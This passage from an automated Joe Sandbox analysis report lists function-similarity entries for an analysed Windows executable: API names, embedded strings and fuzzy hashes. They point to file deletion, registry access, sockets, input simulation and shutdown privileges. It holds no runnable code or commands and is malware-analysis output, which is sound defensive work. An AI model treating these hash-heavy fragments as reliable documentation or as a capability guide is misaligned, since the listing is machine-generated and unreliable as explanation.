                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                          • API String ID: 3232708057-3289030164
                                                                                          • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                          • Instruction ID: 1a3f0baa5caa0b698dcb21b97b372be2fc590a18272263bcd3f20b146d2cd4bc
                                                                                          • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                          • Instruction Fuzzy Hash: 18D18122B1CA52C6EB10FB65D4551FDA761FB84B94FC00132EA8D47AB9EF78D508C720
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1409584000-438819550
                                                                                          • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                          • Instruction ID: 72ce09ea0d1a7fb210132dc916f0734ca40b557979ddc37c1f60f4c311d93d53
                                                                                          • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                          • Instruction Fuzzy Hash: C4413C21A0C646D4EA00FB65E8483B9A3A1FB84BA4FC45531DDAE436B4EF7CD40AC720
                                                                                          Similarity
                                                                                          • API ID: SendString
                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                          • API String ID: 890592661-1007645807
                                                                                          • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                          • Instruction ID: 12d11f5e93ee2aa868b1d5cc593358024b4cafbf75b570c235a21e7db83cccdd
                                                                                          • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                          • Instruction Fuzzy Hash: 90214F22A1C553D2E720FB25F85476AE330BBA8748FD14131E98D43DA8FEACD509CB60
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2640511053-438819550
                                                                                          • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                          • Instruction ID: 3f3144eb672572fa1983679f9a470dd15cd748145012eb5df69ac3233f8d10dc
                                                                                          • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                          • Instruction Fuzzy Hash: 4441AB21A0CA46D4EA00BB55A8487BAA391EB45BE4FC05535DDEE03AF5FF7CD40AC720
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 3827137101-3457252023
                                                                                          • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                          • Instruction ID: 6164cf0447a8bb79fb4ef251e8ef636b2853c6f0e97d4b965184d5470eb7b604
                                                                                          • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                          • Instruction Fuzzy Hash: EE41632161C683C5E720BF61E8046FDA3A0FF85798F940136DA9D57AA8EF7CD546C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                          • String ID:
                                                                                          • API String ID: 3218304859-0
                                                                                          • Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                          • Instruction ID: bd61385ec2fe9324de0f308f031404fb94e092b9248101cb658be874310c26ca
                                                                                          • Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                          • Instruction Fuzzy Hash: 24F18332B0DA42C6EB10FF65E5906ACB770EB89B94B818532DE9D47B65EF38E001C754
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2762341140-0
                                                                                          • Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                          • Instruction ID: d422dc6c2454377654325c5098937abb31e185b9f1694f5cea559a473e2fd41c
                                                                                          • Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                          • Instruction Fuzzy Hash: 66C1492660CB85C6EB10FF66E8842ADA760FB88B94F854036DE8E47775EF78D445C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 1255039815-0
                                                                                          • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                          • Instruction ID: f4e6c24c4b816b00f3e8f0d492447b0fcafb480a1c84e58247850d028d47c400
                                                                                          • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                          • Instruction Fuzzy Hash: B261B062F0C651C6EB10FF61C8446AD77B5FB89B88B844435DE89537A8EF38D546C360
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                          • Instruction ID: 4bed860fc6712e52731461b724cfc2c78a12e851e90eeffe3a5eb3e83754b127
                                                                                          • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                          • Instruction Fuzzy Hash: 71416032A0CA46D5EB10BB65D4882BCA771FB88B94F954432CA8D13BA5FF78D585C320
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2395222682-0
                                                                                          • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                          • Instruction ID: 6dfd31b40ed6ee5a59e04bc97607667533812eb15960362e0a2c01f3945c3e03
                                                                                          • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                          • Instruction Fuzzy Hash: 70D13936B0CB46C6EB24BB65D4442ADA3A1FB98F88B904436DE8D57B74EF38D445C360
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                          • Instruction ID: 3e31e6e0fe65f254632394fa945575d23cefe14f4fae3f671aaf49b3ea62ffd6
                                                                                          • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                          • Instruction Fuzzy Hash: EF71B036A0DA86C5E720EF65E8546ED6760FB88B94F904132EE8D47B64EF3CD146C710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1737998785-0
                                                                                          • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                          • Instruction ID: 04648a4053e41510158cb6004015759842f1eff11ae08885170068ef73fcdaa5
                                                                                          • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                                          • Instruction Fuzzy Hash: 05415D72A0CA82C2EB14FB55D598378B760FF88B85F858434DA8E07762EF7CE0558764
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 4047182710-1173974218
                                                                                          • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                          • Instruction ID: 0a2dcc4c6f92c6da06bb64fef754cb848d633e98ec7398f9fa8e75ae8ee2b2c8
                                                                                          • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                          • Instruction Fuzzy Hash: A9814522A0CA42D5EB50FB65E4441FDAB60EB94794FC01132EACE47ABAEF7CD545C720
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                          • String ID: ?
                                                                                          • API String ID: 500310315-1684325040
                                                                                          • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                          • Instruction ID: a84165298cd81896b29140d8b5dcbefc3fefd00224dca271a768b52264ea81b1
                                                                                          • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                          • Instruction Fuzzy Hash: 65617D72A0C652C6E750FF21A9405B9B7A4FB88794FC41136EA8D4B6A5FF3CE441CB60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                          • String ID:
                                                                                          • API String ID: 540024437-0
                                                                                          • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                          • Instruction ID: 19089e277908ac9532d5e77119a9d3065d7b1259187e942f97631c9cf134b09b
                                                                                          • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                          • Instruction Fuzzy Hash: 0441AF61A0C692C6EB24FF16E45026DA760FF85FA0F844530DADE477A2EF7CD1558710
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmp
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 0-572801152
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 87235514-0
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2649000838-1173974218
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                          • String ID:
                                                                                          • API String ID: 383626216-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1239891234-0
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1927845040-438819550
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 948891078-24824748
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _handle_error
                                                                                          • String ID: !$VUUU$fmod
                                                                                          • API String ID: 1757819995-2579133210
                                                                                          APIs
                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF74D072D60
                                                                                            • Part of subcall function 00007FF74D06B184: GetCurrentProcess.KERNEL32(00007FF74D06B21D), ref: 00007FF74D06B1B1
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                          • String ID: *$.$.
                                                                                          • API String ID: 2518042432-2112782162
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 2163645468-3733053543
                                                                                          APIs
                                                                                          Strings
                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF74D055C43
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                          • API String ID: 389471666-631824599
                                                                                          • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                          • Instruction ID: 8eb472fa4cb4946086e0a7a710a133cd2c8c6e204ce7d9ce2a1f97377deb44be
                                                                                          • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                          • Instruction Fuzzy Hash: 2B11FE31A1CB46D6E744BB21D65936973A4FB48345F804535CA8D43560FF7CE4648720
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                          • API String ID: 2574300362-1355242751
                                                                                          • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                          • Instruction ID: 495110f07c95f65f996084718c182e03a35f229d0d71507ebcbb000279891876
                                                                                          • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                          • Instruction Fuzzy Hash: E0E0C965D0DB0AC2EB15BB60E4183A463A0BB08B48FD40834DA9D46774FFBCD5948350
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2733932498-0
                                                                                          • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                          • Instruction ID: 46657c9df40ceba00d4ce2149a19b7fae38f96c152326e2c4b20bc1b1b4bc4a3
                                                                                          • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                          • Instruction Fuzzy Hash: 1DB16C26B0DB56C2EB24FB26D4946ADA760EB48FD4F855036DE8D477B6DF38D4408320
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 2000298826-0
                                                                                          • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                          • Instruction ID: f7ff4e81ad93ae2b0e1fda112a34a04f40b79e109af16b6ffeccfd2da2017b86
                                                                                          • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                          • Instruction Fuzzy Hash: 30714C36A1CB41C6E700FB25E4447AEA7A0FB88B88F804136EA8D47B69EF7CD545C750
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                          • String ID:
                                                                                          • API String ID: 3541575487-0
                                                                                          • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                          • Instruction ID: 5e908fe9ada736eae2dfcbd7d3664e948811fccde6bb3242d624a18fd2cddaa5
                                                                                          • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                          • Instruction Fuzzy Hash: 71515832A0CA46C6DB14FF65E4943A8B760FB84B94F804232DA9E477A5EF7CE551C720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                          • String ID:
                                                                                          • API String ID: 2278415577-0
                                                                                          • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                          • Instruction ID: d227fcfe253c58077ca163fdf9dbd5ce936865bfba94d4d13ad045250d195082
                                                                                          • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                                          • Instruction Fuzzy Hash: 1A219D7260CA85C5D714FF26E444269B7A1FB88B94F848439DE8C07728EF78D555C710
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                          • String ID:
                                                                                          • API String ID: 3429775523-0
                                                                                          • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                          • Instruction ID: aa08c421b866bf67609c4b1fe3793dfe137baeae4a487e19db936ef5cdd758cc
                                                                                          • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                                          • Instruction Fuzzy Hash: EF014073628781CFE7209F20D4593AD73A0F75476EF400929F64986A99DB7DC258CB80
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocInitializeProcess
                                                                                          • String ID:
                                                                                          • API String ID: 570334035-0
                                                                                          • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                                          • Instruction ID: 350e2df5e4fd8d9eab632d3e73e888e57b7d76c7aac2dfe5a3cc2b2c0c043c9e
                                                                                          • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                                          • Instruction Fuzzy Hash: 62F01236A1DB55C2D714EB56F04811EB3A0FB89B90B948534DF8943724EF3CD9548B80
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .
                                                                                          • API String ID: 0-248832578
                                                                                          • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                          • Instruction ID: da4393af7fd023b8b6fb278aa0c0b4e925bd9f0065313a52f55ec4bdcbcca98b
                                                                                          • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                                          • Instruction Fuzzy Hash: DD315C51B1C691C4FB20BF72981467AE651FB50BE4F848631EEAD0BBE4EE3CD4014310
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: %.3d
                                                                                          • API String ID: 481472006-986655627
                                                                                          • Opcode ID: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                                                          • Instruction ID: da3e4c6339c8ffec8eb79b74c909ce0db5979c3d07c0a9b22676dd580b3847a4
                                                                                          • Opcode Fuzzy Hash: 0a1c5bb443c020c262df8418af2e2bd068d9f57d67344cb8eb19a51fac8e6ff3
                                                                                          • Instruction Fuzzy Hash: DED0E261A1C523D5EA10FF64E8555BEE332BB80714BD00072E98E028E8BF69E508E720
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 599397726-0
                                                                                          Similarity
